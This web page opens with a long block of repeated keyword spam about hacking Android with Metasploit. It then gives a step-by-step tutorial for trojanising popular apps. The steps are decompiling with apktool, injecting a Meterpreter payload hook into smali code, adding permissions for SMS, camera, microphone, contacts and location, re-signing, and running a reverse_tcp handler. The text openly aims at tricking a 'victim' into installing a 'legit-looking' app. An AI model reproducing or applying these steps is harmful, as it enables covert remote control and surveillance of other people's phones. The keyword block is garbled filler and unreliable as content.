- Hack Android Phone Using Metasploit
- Hacking Android With Metasploit
- Metasploit Hacking Android
- Metasploit Android
- Hack Android Using Metasploit
- Metasploit Android Apk
- How To Use Metasploit To Hack Android
- Metasploit Apk
- Metasploit Android Hack
- Hack Android Metasploit
Hack Android Phone Using Metasploit Metasploit Android Hack Metasploit Apk Hacking Android With Metasploit How To Use Metasploit To Hack Android Metasploit Hacking Android Metasploit Android Metasploit Android Apk Hack Android Using Metasploit Hack Android Metasploit
Hack Android Phone Using Metasploit Metasploit Android Hack Hacking Android With Metasploit windows apk Metasploit Apk Hack Android Phone Using Metasploit linux root software apk windows app android android hacking typing How To Use Metasploit To Hack Android Hacking Android With Metasploit linux Hacking Android With Metasploit Hack Android Phone Using Metasploit Hack Android Phone Using Metasploit system android Hack Android Phone Using Metasploit run Metasploit Apk apk hacking apk file privacy Hack Android Phone Using Metasploit phone android devices security linux metasploit metasploit Hack Android Phone Using Metasploit Hack Android Phone Using Metasploit linux software meterpreter android phone meterpreter Metasploit Android Hack Metasploit Android Hack phone server system hacking payload payload system browser android system website ip address kali public linux hacking tutorial apk Hack Android Phone Using Metasploit Hack Android Phone Using Metasploit Metasploit Android Apk hack Hack Android Phone Using Metasploit code hacking Metasploit Android Hack android Metasploit Android Hack Android Metasploit android phone app. Android linux android meterpreter kali linux files metasploit Metasploit Android Hack apk phone linux app software Hack Android Phone Using Metasploit computer computer android phone 2022 metasploit linux phone android android device windows Hack Android Phone Using Metasploit tool to install hacker Hack Android Phone Using Metasploit android Metasploit Apk metasploit linux Hacking Android With Metasploit metasploit security android phones ethical hacking web hacking apk security tutorial Hack Android Phone Using Metasploit Hack Android Phone Using Metasploit android android device linux Hack Android Phone Using Metasploit phone phone android Hack Android Phone Using Metasploit hacking hack kali android kali android phone the internet phone app android android windows linux hack meterpreter How To Use Metasploit To Hack Android apps phone meterpreter android Metasploit Apk kali phone tool app run hack tool meterpreter Hacking Android With Metasploit Hack Android Phone Using Metasploit internet hacking kali information tutorial kali password hack browser android android security kali Hack Android Phone Using Metasploit. Meterpreter Metasploit Android Apk linux run Hack Android Phone Using Metasploit system hack linux Hack Android Phone Using Metasploit software linux hacking hacking code to install Hack Android Using Metasploit android apps hack Hack Android Phone Using Metasploit app password meterpreter systems meterpreter Hack Android Metasploit code image tutorial linux public ip address Metasploit Android Hack linux How To Use Metasploit To Hack Android Hack Android Phone Using Metasploit password Metasploit Android Hack windows apps android website connection tool hack windows hacking android sms Hack Android Phone Using Metasploit system hacking to install kali linux security website Hack Android Phone Using Metasploit Metasploit Android hack android phone Hack Android Phone Using Metasploit android payload kali linux perform browser phone android android phones Hack Android Phone Using Metasploit website run Hack Android Phone Using Metasploit linux android apps Hack Android Phone Using Metasploit system android device malicious Metasploit Android metasploit kali How To Use Metasploit To Hack Android Metasploit Android Apk linux android Metasploit Android Apk android Hack Android Phone Using Metasploit Hacking Android With Metasploit hacking android phones hacking penetration testing hacking Hack Android Using Metasploit metasploit hacking
Hacking Android With Metasploit linux
Metasploit Hack Android Phone Using Metasploit apk kali linux hacking data metasploit windows android phones malicious hacker phone Hack Android Phone Using Metasploit code Hack Android Phone Using Metasploit Hack Android Phone Using Metasploit linux kali data kali How To Use Metasploit To Hack Android apk app browser Hack Android Metasploit software kali linux linux phone hack server kali Hack Android Using Metasploit How To Use Metasploit To Hack Android Hack Android Phone Using Metasploit Hack Android Phone Using Metasploit phone cancel android hack typing. Connection system system android linux How To Use Metasploit To Hack Android payload metasploit hackers security perform hack linux security kali Metasploit Hacking Android kali Hacking Android With Metasploit metasploit kali linux Hack Android Metasploit windows hacking kali server android Metasploit Apk hacking android android malicious kali linux Hacking Android With Metasploit android device software Hack Android Phone Using Metasploit. Android typing tutorial linux to install linux hack port forwarding kali linux apk web android hacking apk sms malicious linux linux linux apps public Metasploit Hacking Android linux hacking system payload security penetration testing hacking apk system system Metasploit Android hack password hack tool Metasploit Android Hack kali kali cyber hackers kali linux the internet Metasploit Android Apk. Apk Hack Android Phone Using Metasploit run kali linux apps linux phone linux android devices Metasploit Android Apk internet website android hack phone linux Hack Android Using Metasploit android password apk kali linux Hack Android Phone Using Metasploit linux public android Hack Android Phone Using Metasploit windows web phone penetration testing kali linux to install Hacking Android With Metasploit hacking hacking linux Hack Android Metasploit windows computer phone. Hack Android Phone Using Metasploit Hacking Android With Metasploit android phone security Metasploit Hacking Android hacking Hack Android Phone Using Metasploit Hack Android Phone Using Metasploit hack facebook metasploit payload android linux apk hacker kali android Metasploit Android Hack Android Phone Using Metasploit app hack Hack Android Phone Using Metasploit apk Hack Android Phone Using Metasploit Metasploit Android Apk payload hack Hack Android Phone Using Metasploit Hacking Android With Metasploit phone Metasploit Apk android devices linux Hack Android Phone Using Metasploit password security hacking information Hack Android Phone Using Metasploit
Hack Android Using Metasploit apk
Android payload Metasploit Android Metasploit Apk kali linux android device hack apps hacking Metasploit Android Apk Metasploit Android Hack android linux kali linux Metasploit Android Apk linux hack Metasploit Apk Hack Android Phone Using Metasploit code hacking kali hacking kali Hack Android Phone Using Metasploit password security server browser cancel data hack meterpreter connection Hack Android Phone Using Metasploit kali linux Metasploit Android Hack android phone facebook kali apk code perform hacking public Hack Android Phone Using Metasploit android phone tutorial linux Hack Android Phone Using Metasploit windows sms cyber linux information Hack Android Metasploit kali phone metasploit android phone hacking Hack Android Phone Using Metasploit android Hack Android Phone Using Metasploit Hack Android Phone Using Metasploit hacking android device kali password kali Metasploit Android Apk payload Metasploit Hacking Android phone android Metasploit Apk linux perform app typing Hack Android Phone Using Metasploit android apk files metasploit phone. Linux Metasploit Android windows hack android android internet Metasploit Hacking Android server password kali hackers windows Hack Android Phone Using Metasploit kali metasploit hack Metasploit Android Apk Metasploit Android Metasploit Android Hack Hack Android Phone Using Metasploit Metasploit Android Hack android Hack Android Using Metasploit android Metasploit Android malicious linux hacking Metasploit Android Hack hacking security linux linux hack metasploit browser Hack Android Phone Using Metasploit Hack Android Phone Using Metasploit hacking Hack Android Using Metasploit Metasploit Android Hack root kali Hack Android Phone Using Metasploit website kali app Hack Android Phone Using Metasploit hack android phone hack Hacking Android With Metasploit hacking malicious hacking kali linux kali linux Metasploit Hacking Android hack Hack Android Phone Using Metasploit Hack Android Using Metasploit Metasploit Android Metasploit Android Apk Hack Android Phone Using Metasploit security ethical hacking website root Hack Android Phone Using Metasploit Hack Android Phone Using Metasploit linux windows. Internet Metasploit Android Apk tutorial connection Hacking Android With Metasploit Hack Android Phone Using Metasploit Hack Android Phone Using Metasploit root tool files Hacking Android With Metasploit hacking hacking app android Hack Android Phone Using Metasploit kali payload Metasploit Android android hack password server linux hacking How To Use Metasploit To Hack Android Hack Android Phone Using Metasploit phone Hack Android Metasploit 2022 Metasploit Android Apk hacking Metasploit Android metasploit linux linux Hack Android Phone Using Metasploit cyber run android windows metasploit Metasploit Android windows software code Hack Android Using Metasploit apk perform hacking image linux android hacking payload android phone server Metasploit Android Apk payload android internet apk file windows software meterpreter Hacking Android With Metasploit linux Metasploit Android Apk hacking Metasploit Hacking Android kali linux phone How To Use Metasploit To Hack Android systems hacking metasploit android phone android phone linux system payload Metasploit Hacking Android Hack Android Phone Using Metasploit app typing android kali Metasploit Hacking Android Metasploit Apk android security linux Metasploit Android Apk hack
Metasploit Android Hack linux
Ip address hacking hacking Hack Android Phone Using Metasploit apk file Hack Android Phone Using Metasploit linux hacking app Hack Android Metasploit ip address android device public meterpreter hack meterpreter server Metasploit Hacking Android metasploit linux How To Use Metasploit To Hack Android android phone Metasploit Apk Hack Android Metasploit tutorial hacking security How To Use Metasploit To Hack Android payload run payload kali connection payload browser hackers typing hacking hacking ethical hacking android devices linux security Hack Android Phone Using Metasploit ip address kali Hack Android Phone Using Metasploit Hacking Android With Metasploit hack linux Hack Android Phone Using Metasploit code Hack Android Phone Using Metasploit payload hacking 2022 Hack Android Phone Using Metasploit Hack Android Using Metasploit public run hacking password metasploit port forwarding Hack Android Phone Using Metasploit linux system phone data android Hack Android Metasploit run typing Hack Android Phone Using Metasploit android phone android phone linux android code cyber android system Hack Android Phone Using Metasploit app server. Hack Android Phone Using Metasploit android phones Metasploit Android security app linux metasploit hacking Metasploit Android Hack browser Hack Android Phone Using Metasploit meterpreter hacking run android server kali software android Metasploit Android Apk hack linux hackers kali linux kali meterpreter metasploit computer android hacker code How To Use Metasploit To Hack Android Hack Android Phone Using Metasploit windows port forwarding to install linux android phone files Hack Android Using Metasploit run hack browser kali linux android phone Hack Android Phone Using Metasploit server kali linux kali android hack linux server metasploit android phone public files sms Metasploit Apk security tutorial software security linux android to install android phone internet android device apk metasploit metasploit android Hack Android Phone Using Metasploit Hack Android Phone Using Metasploit Hack Android Phone Using Metasploit image Hack Android Phone Using Metasploit kali linux Metasploit Android Hack 2022 Hack Android Phone Using Metasploit android devices hack password information the internet kali linux run port forwarding system metasploit the internet linux
Metasploit Apk payload
Meterpreter hacking Hack Android Metasploit Hack Android Phone Using Metasploit Metasploit Hacking Android Hacking Android With Metasploit linux hacking android linux kali linux android hacking payload Hack Android Phone Using Metasploit hacking login hack password linux Hack Android Phone Using Metasploit phone apk android hacking Hack Android Using Metasploit privacy hacking linux Metasploit Hacking Android How To Use Metasploit To Hack Android tool Metasploit Android Hack code android 2022 Metasploit Android Apk data linux hack windows Metasploit Hacking Android kali How To Use Metasploit To Hack Android
Metasploit Android Apk payload
Hacking windows 2022 security android phone kali Hack Android Phone Using Metasploit apk hack Metasploit Hacking Android tutorial linux to install windows phone image data Hack Android Phone Using Metasploit apps hacking linux Hack Android Phone Using Metasploit How To Use Metasploit To Hack Android software hacking android device linux malicious android Metasploit Android Hack phone windows apps facebook Hack Android Phone Using Metasploit apk windows kali linux linux phone apk file app hacking metasploit password How To Use Metasploit To Hack Android hacking information Hack Android Phone Using Metasploit kali penetration testing password Metasploit Android Hack Hack Android Phone Using Metasploit Hack Android Using Metasploit app 2022 phone browser linux. Image Metasploit Hacking Android security security security internet apk password phone Hack Android Using Metasploit security linux android Hack Android Phone Using Metasploit hack kali linux web Metasploit Apk kali linux Hack Android Metasploit Hack Android Using Metasploit ip address linux Metasploit Hacking Android website Hack Android Phone Using Metasploit system linux android Metasploit Hacking Android android kali apk information windows server facebook Hack Android Phone Using Metasploit kali kali linux hacking public password linux meterpreter How To Use Metasploit To Hack Android How To Use Metasploit To Hack Android windows metasploit apk file Hack Android Phone Using Metasploit kali linux hacking. Linux Hack Android Using Metasploit payload android device kali hack hack android apk run metasploit Metasploit Apk Hack Android Phone Using Metasploit privacy tool hack linux android run tool android phone hacking linux 2022 linux linux Hack Android Phone Using Metasploit 2022 meterpreter public hacking phone android phone meterpreter penetration testing tool metasploit Hack Android Metasploit Metasploit Android Hack android kali linux public hacking hack image password android meterpreter android hacking Hack Android Using Metasploit metasploit kali Hack Android Phone Using Metasploit Hack Android Phone Using Metasploit systems payload Metasploit Android. Web run tutorial penetration testing payload phone android hack android software typing hacking website web metasploit Metasploit Android Apk computer linux Hack Android Phone Using Metasploit hacking to install Hack Android Phone Using Metasploit computer windows hacking malicious android hacking hack android phone Hack Android Phone Using Metasploit public hacking web linux kali kali linux linux android phone software kali linux Hack Android Metasploit apk login Hack Android Phone Using Metasploit system hacking ip address android linux Hack Android Using Metasploit Metasploit Hacking Android linux Hack Android Phone Using Metasploit hacking. Metasploit public hack security metasploit kali linux hacking android device Hack Android Metasploit linux linux android system meterpreter Hack Android Phone Using Metasploit Hacking Android With Metasploit phone windows port forwarding Hack Android Using Metasploit Hack Android Metasploit android website Hack Android Phone Using Metasploit payload apk file hacking hacking phone hacking code Metasploit Android payload linux hackers android android linux android phone Hack Android Metasploit hacking security web Hack Android Phone Using Metasploit kali android phone 2022 phone linux Hack Android Phone Using Metasploit
Metasploit Hacking Android hack
Connection android android the internet apk meterpreter security hack hacking linux to install connection phone hacking Metasploit Apk Hack Android Metasploit security Hack Android Phone Using Metasploit malicious android 2022 system linux windows How To Use Metasploit To Hack Android system app public Hack Android Phone Using Metasploit hacking payload root metasploit Hacking Android With Metasploit software Hack Android Phone Using Metasploit hacking password hackers security hacking Metasploit Android linux files linux Metasploit Android Hack password Hack Android Metasploit Hack Android Phone Using Metasploit kali android Metasploit Apk linux Hack Android Using Metasploit computer connection kali server apk app android android Hack Android Phone Using Metasploit perform android linux android hack password Hack Android Phone Using Metasploit Hack Android Phone Using Metasploit run kali. Software app linux Hacking Android With Metasploit android metasploit connection apk file linux meterpreter android system root Hacking Android With Metasploit apk file Hack Android Phone Using Metasploit security Metasploit Apk android linux payload information Hack Android Phone Using Metasploit hacking tutorial Metasploit Android Apk payload data Hack Android Phone Using Metasploit kali phone hack hack payload server phone Hack Android Phone Using Metasploit windows android phone Hack Android Phone Using Metasploit apps Hack Android Phone Using Metasploit Hack Android Phone Using Metasploit android hacking files Metasploit Hacking Android to install android Hack Android Phone Using Metasploit Hack Android Metasploit Hacking Android With Metasploit 2022 typing kali linux kali linux hacking android Hacking Android With Metasploit Hack Android Phone Using Metasploit linux metasploit phone web information hacker hacking run phone 2022 system cancel privacy android device port forwarding metasploit hacking hacking Hacking Android With Metasploit hackers apk file metasploit ip address run linux Hack Android Phone Using Metasploit payload payload. Password android linux hack How To Use Metasploit To Hack Android to install Metasploit Apk password android hacking image hack Hack Android Metasploit meterpreter linux apk android Hack Android Phone Using Metasploit server to install kali systems android connection Metasploit Android Apk apk Metasploit Android Metasploit Hacking Android server Hack Android Metasploit cyber android Hack Android Phone Using Metasploit Metasploit Android Apk phone apk Hack Android Phone Using Metasploit Hack Android Phone Using Metasploit android android meterpreter Metasploit Apk android phone android hacking hacking android devices files payload phone linux security apk file android android phone privacy kali linux hack 2022 android 2022 How To Use Metasploit To Hack Android kali linux Metasploit Android kali linux software hacking apk android 2022
How To Use Metasploit To Hack Android linux
Linux payload ip address root hacking penetration testing login run hacking linux apk file Hack Android Phone Using Metasploit 2022 kali linux hacking android kali Hack Android Phone Using Metasploit phone Metasploit Hacking Android hackers 2022 android phone Hack Android Using Metasploit hacking windows metasploit linux malicious data hacking Hack Android Phone Using Metasploit Metasploit Android computer web payload android phone android internet Metasploit Apk website meterpreter linux linux payload. Cyber metasploit Metasploit Apk server android hacking kali Hack Android Metasploit website linux hack tool system hack to install code phone apk file Metasploit Apk linux kali linux linux tool metasploit computer phone code metasploit android How To Use Metasploit To Hack Android hacker Hack Android Phone Using Metasploit Hack Android Phone Using Metasploit linux information Hack Android Phone Using Metasploit Hack Android Phone Using Metasploit linux Hack Android Using Metasploit root linux metasploit payload android android linux port forwarding Hack Android Phone Using Metasploit metasploit. Metasploit Hack Android Phone Using Metasploit public android phone Hack Android Phone Using Metasploit system connection linux Hack Android Phone Using Metasploit tool linux Metasploit Android Hack connection software meterpreter android Hack Android Phone Using Metasploit android web android windows security android device linux hacking hacking Hack Android Using Metasploit phone apk Hack Android Phone Using Metasploit hackers hacking hack apk hacker ip address linux Hack Android Metasploit Hack Android Phone Using Metasploit hacking internet linux tool ethical hacking android Hack Android Phone Using Metasploit server android phone cyber android phone connection Hack Android Phone Using Metasploit Hack Android Phone Using Metasploit linux android the internet hacking. Kali android Hack Android Phone Using Metasploit android devices hacking 2022 kali linux run hacking security metasploit Metasploit Apk information Metasploit Android Hack Android Phone Using Metasploit app information Hack Android Phone Using Metasploit Hack Android Phone Using Metasploit hacking password run linux Hack Android Phone Using Metasploit Hack Android Phone Using Metasploit apps apk Hack Android Phone Using Metasploit android phones hacker hack hack hacking linux meterpreter apk metasploit facebook android hacking phone hacking Hack Android Phone Using Metasploit metasploit run Metasploit Android Apk hack metasploit. Metasploit Hack Android Phone Using Metasploit Hack Android Phone Using Metasploit root 2022 Hack Android Using Metasploit kali linux Metasploit Android meterpreter linux Hack Android Phone Using Metasploit Metasploit Android hacking Metasploit Hacking Android android device linux hacking hacking Hack Android Phone Using Metasploit hack android android website hacking internet 2022 metasploit Metasploit Android Hack phone meterpreter Hack Android Phone Using Metasploit system kali linux How To Use Metasploit To Hack Android system Metasploit Hacking Android code the internet to install run hack internet hacking Hack Android Phone Using Metasploit Hack Android Phone Using Metasploit hacking
Hack Android Metasploit information
Metasploit Android hack
Hack Android Metasploit Hacking Android With Metasploit How To Use Metasploit To Hack Android Metasploit Android Hack Metasploit Hacking Android Metasploit Apk Metasploit Android Hack Android Using Metasploit Metasploit Android Apk Hack Android Phone Using Metasploit
How To Use Metasploit To Hack Android Metasploit Android Apk Hacking Android With Metasploit Hack Android Phone Using Metasploit Metasploit Android Hack Hack Android Using Metasploit Metasploit Android Metasploit Apk Hack Android Metasploit Metasploit Hacking Android
Hack Android Phone Using Metasploit | apk |
---|---|
|
|
Hacking Android With Metasploit!
We’ve discussed how to create Metasploit payload and how to configure your Linux to NOIP account for DDNS in First Part of this series
In this second and the last part we’ll do Hooking up the metasploit node and embedding the payload inside the Android App. (Your favored apps like Facebook or Gmail or any games)
For that we require:
- APKTOOL the android reverse engineering tool
You can install the apktool easily by typing this command on terminals (Apktool is came with the Kali-Linux OS)
sudo apt-get install apktool
- Jarsigner for digitally sign the android Apps with fake certificates
Download necessary files for jarsigner from our GitHub repository
OneClicksigner
So now all we’ve to do is:
1. Generate the Meterpreter payload
2.Decompile the payload and the original apk
3.Copy the payload files to the original apk
4.Inject the hook into the appropriate activity of the original apk
5.Inject the permissions in the AndroidManifest.xml file
6.Re-compile the original apk
7.Sign the apk using Jarsigner
We’ve already done with generating Metasploit payload in last part.
So we’ll continue to
Second step
Decompiling the payload and you’re desired APK file which you want place your payload:
The apktool decompile command is as follows
apktool d -f -o payload /root/meterpreter.apk
apktool d -f -o original /root/original_app_name.apk
After compliment this process there will be 2 folders at the root one contains the files of msf payload and another one is of original apk which is to be binded by payload.
Third step
Coping the Files from Payload apk to original apk:
So open up the AndroidManifest.xml file located inside the “/root/original” folder using any text editor.
If you know HTML, then this file will look familiar to you. Both of them are essentially Markup Languages, and both use the familiar tags and attributes structure e.g. <tag attribute=”value”> Content </tag>. Anyway, look for an <activity> tag which contains both the lines –
<action android:name=”android.intent.action.MAIN”/>
<category android:name=”android.intent.category.LAUNCHER”/>
Step four
Inject the hook into the appropriate activity of the original apk
On a side note, you can use CTRL+F to search within the document in any GUI text editor. When you locate that activity, note its “android:name” attribute’s value
Those two lines we searched for signifies that this is the activity which is going to start when we launch the app from the launcher icon, and also this is a MAIN activity similar to the ‘main’ function in traditional programming.
Now that we have the name of the activity we want to inject the hook into, let’s get to it! First of all, open the .smali code of that activity using text editors. Just open a terminal and type –
gedit /root/original/smali/Activity_Path
Replace the Activity_Path with the activity’s “android:name“, but instead of the dots, type slash. Actually the smali codes are stored in folders named in the format the “android:name” is in, so we can easily get the location of the .smali code in the way we did.
Then search for the following line in the smali code using CTRL+F –
;->onCreate(Landroid/os/Bundle;)V
When you get that change the entire line to this
invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
When the mainactivity executes this line what happens is the app executes the main activity of the app with the metasploit payload.
So we can get the meterpreter shell in our Console.
Step five
Inject the permissions in the AndroidManifest.xml file
Now we all are set but we must have to give necessary permissions or additional permission to get the full control over android device for that we’ve to edit the android manifest xml file
XML file looks as the HTML so it’s easy to manipulate the file.
Please copy this text and place it in specified area after <permission> tag with other but don’t make redundant lines:
<uses-permission android:name="android.permission.VIBRATE"/> <uses-permission android:name="android.permission.CHANGE_NETWORK_STATE"/> <uses-permission android:name="android.permission.WAKE_LOCK"/> <uses-permission android:name="android.permission.READ_PHONE_STATE"/> <uses-permission android:name="com.android.launcher.permission.INSTALL_SHORTCUT"/> <uses-permission android:name="android.permission.CAMERA"/> <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/> <uses-permission android:name="android.permission.PERSISTENT_ACTIVITY"/> <uses-permission android:name="android.permission.MOUNT_UNMOUNT_FILESYSTEMS"/> <uses-permission android:name="android.permission.READ_LOGS"/> <uses-permission android:name="android.permission.DEVICE_POWER"/> <uses-permission android:name="android.permission.SET_WALLPAPER"/> <uses-permission android:name="android.permission.WRITE_SETTINGS"/> <uses-permission android:name="android.permission.EXPAND_STATUS_BAR"/> <uses-permission android:name="android.permission.GET_TASKS"/> <uses-permission android:name="android.permission.DISABLE_KEYGUARD"/> <uses-permission android:name="android.permission.STATUS_BAR"/> <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/> <uses-permission android:name="com.android.launcher.permission.READ_SETTINGS"/> <uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/> <uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/> <uses-permission android:name="android.permission.INTERNET"/> <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/> <uses-permission android:name="android.permission.ACCESS_COURSE_LOCATION"/> <uses-permission android:name="android.permission.SEND_SMS"/> <uses-permission android:name="android.permission.RECEIVE_SMS"/> <uses-permission android:name="android.permission.RECORD_AUDIO"/> <uses-permission android:name="android.permission.CALL_PHONE"/> <uses-permission android:name="android.permission.READ_CONTACTS"/> <uses-permission android:name="android.permission.WRITE_CONTACTS"/> <uses-permission android:name="android.permission.READ_SMS"/> <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/> <uses-permission android:name="com.android.vending.BILLING"/>
Step six
Re-compile the original apk
After saving the XML file we’ve to go for re-compilation of file to get embedded with .apk file.
apktool b /root/original
Now the original apk file is ready!
Step seven
Sign the apk using Jarsigner
Android requires that all apps be digitally signed with a certificate before they can be installed. It (Android) uses this certificate to identify the author of an app, and the certificate does not need to be signed by a certificate authority. Android apps often use self-signed certificates. The app developer holds the certificate’s private key.
In this case we are going to sign the apk using the default android debug key. Just run the following command –
jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA apk_path androiddebugkey
The file keystore and all the necessary files there in the oncliksign.zip file please download this from the following links
Download Link
Now if you can get the victim to install and run this very legit-looking app in his phone, you can get a working meterpreter session on his phone!
Just open your console command:
->msfconsole
->use multi/handler
->set PAYLOAD android/meterpreter/reverse_tcp
->set LHOST
->set LPORT 4444
->exploit
While specifying PAYLOAD Please check that what you’ve given while creating PAYLOAD
it should be same and to get the meterpreter session the port 4444 should be PORT FORWARDED from your router/modem.
To do this go to your gateway or home-page of router (Example: 192.168.1.1/home.html)
There you’ll find the Virtual Server or Port Forwarding option just set all TCP port forwarding active.
If you use internet from android mobile hotspots please Download Port Forward Apps avilable on Playstore.
Profit from this Tool is
When the victim installs the app in his phone you’ll get meterpreter session opened and you can perform many operations on it like taking photo,recording voice check_root etc…
Just type help when you get meterpreter session there are several operations will be listed!
I hope this Metasploit series of hacking android phones is very helpful. 🙂
If you have any queries please write in comments section we’ll take care of it.
Thank you..!
Lanwil DS (Team HR)